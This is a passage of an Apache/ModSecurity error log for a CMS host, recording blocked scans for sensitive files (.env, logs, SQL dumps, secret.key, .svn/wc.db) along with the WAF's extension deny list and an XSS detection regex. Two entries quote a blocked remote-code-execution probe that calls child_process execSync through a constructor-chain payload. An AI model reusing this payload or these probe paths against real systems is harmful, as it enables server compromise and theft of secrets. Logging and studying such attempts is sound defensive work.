18:31:29.130338 2026] [:error] [pid 23860:tid 23921] [client 185.177.72.22:43998] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/log/development.log"] [unique_id "aZ3SYZBWPCzoVu8DXHag3QAAABg"] [Tue Feb 24 18:31:29.385298 2026] [:error] [pid 23860:tid 23904] [client 185.177.72.22:44004] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/log/development.log"] [unique_id "aZ3SYZBWPCzoVu8DXHag4AAAAAc"] [Tue Feb 24 18:31:31.158347 2026] [:error] [pid 23860:tid 23901] [client 185.177.72.22:44072] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/logs/access.log"] [unique_id "aZ3SY5BWPCzoVu8DXHag4gAAAAQ"] [Tue Feb 24 18:31:31.168410 2026] [:error] [pid 23860:tid 23903] [client 185.177.72.22:44072] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/logs/app.log"] [unique_id "aZ3SY5BWPCzoVu8DXHag4wAAAAY"] [Tue Feb 24 18:31:31.174635 2026] [:error] [pid 23860:tid 23918] [client 185.177.72.22:44072] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/logs/error.log"] [unique_id "aZ3SY5BWPCzoVu8DXHag5AAAABU"] [Tue Feb 24 18:31:31.394344 2026] [:error] [pid 10294:tid 10384] [client 185.177.72.22:44074] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/logs/access.log"] [unique_id "aZ3SYzuzcxjz9L27429dJAAAARM"] [Tue Feb 24 18:31:31.406390 2026] [:error] [pid 10294:tid 10383] [client 185.177.72.22:44074] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/logs/app.log"] [unique_id "aZ3SYzuzcxjz9L27429dJQAAARI"] [Tue Feb 24 18:31:31.416374 2026] [:error] [pid 10294:tid 10389] [client 185.177.72.22:44074] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/logs/error.log"] [unique_id "aZ3SYzuzcxjz9L27429dJgAAARc"] [Tue Feb 24 18:31:59.007987 2026] [:error] [pid 10294:tid 10364] [client 185.177.72.22:20838] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/php.ini"] [unique_id "aZ3Sfzuzcxjz9L27429fwwAAAQU"] [Tue Feb 24 18:31:59.134473 2026] [:error] [pid 23863:tid 23936] [client 185.177.72.22:20850] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/php.ini"] [unique_id "aZ3Sf0Q2N2H_02JlNwJRogAAAIM"] [Wed Feb 25 14:09:33.473047 2026] [:error] [pid 11277:tid 11354] [client 185.177.72.52:30924] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.bak"] [unique_id "aZ7mfcJg20P-9s7podXq5AAAAQY"] [Thu Feb 26 01:14:09.556346 2026] [:error] [pid 25918:tid 26014] [client 195.178.110.242:47956] [client 195.178.110.242] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/.svn/wc.db"] [unique_id "aZ-CQYx00skzHN5jRIhIaAAAAIM"] [Thu Feb 26 07:05:31.287924 2026] [:error] [pid 10391:tid 10461] [client 85.11.167.4:47710] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1772082343_1617',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo VULN_1772082343_161..."] [ve [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZ_Um0DfrvUqUSdm9IIFEAAAARA"], referer: https://cms-1.dev-unit.com [Thu Feb 26 07:05:31.351470 2026] [:error] [pid 26645:tid 26656] [client 85.11.167.4:47718] [client 85.11.167.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1772082344',{'timeout':30000}).toString();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: found within ARGS:0: {\\x22_response\\x22:{\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo TEST_1772082344',{'timeo..."] [ve [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZ_Um15NQjhZ9LICqu3XhAAAAMk"], referer: https://cms-1.dev-unit.com [Sun Mar 01 06:37:35.674235 2026] [:error] [pid 7725:tid 7760] [client 109.205.180.195:52706] [client 109.205.180.195] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/config.ini"] [unique_id "aaPCj5lVQTSMuBiZ_hrnEAAAAEU"] [Sun Mar 01 06:37:35.685804 2026] [access_compat:error] [pid 7726:tid 7769] [client 109.205.180.195:52732] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Sun Mar 01 06:37:35.697028 2026] [:error] [pid 8115:tid 8142] [client 109.205.180.195:53088] [client 109.205.180.195] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/logs/error.log"] [unique_id "aaPCj0cKk3yGph8tcwQ5xgAAANg"] [Sun Mar 01 06:37:35.707371 2026] [:error] [pid 7723:tid 7752] [client 109.205.180.195:52986] [client 109.205.180.195] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/wp-content/mysql.sql"] [unique_id "aaPCj2z3tQoLCkYUSxc_PAAAABg"] [Sun Mar 01 06:37:50.839680 2026] [:error] [pid 7726:tid 7806] [client 109.205.180.195:59198] [client 109.205.180.195] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/server.log"] [unique_id "aaPCniJialSj9ir98JaVFgAAAJg"] [Sun Mar 01 06:37:50.854755 2026] [:error] [pid 7725:tid 7771] [client 109.205.180.195:59262] [client 109.205.180.195] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/.bak"] [unique_id "aaPCnplVQTSMuBiZ_hrnMwAAAE4"] [Sun Mar 01 06:37:50.855351 2026] [:error] [pid 7725:tid 7771] [client 109.205.180.195:59286] [client 109.205.180.195] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/error.log"] [unique_id "aaPCnplVQTSMuBiZ_hrnNAAAAE4"] [Sun Mar 01 06:37:51.053495 2026] [:error] [pid 9039:tid 9048] [client 109.205.180.195:59508] [client 109.205.180.195] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/private/secret.key"] [unique_id "aaPCn1XURBhiKrb5GS0LGgAAAUc"] [Sun Mar 01 06:38:01.084508 2026] [:error] [pid 9039:tid 9042] [client 109.205.180.195:40624] [client 109.205.180.195] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/export.sql"] [unique_id "aaPCqVXURBhiKrb5GS0LXQAAAUE"] [Sun Mar 01 06:38:05.858393 2026] [:error] [pid 11728:tid 11737] [client 109.205.180.195:41394] [client 109.205.180.195] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ 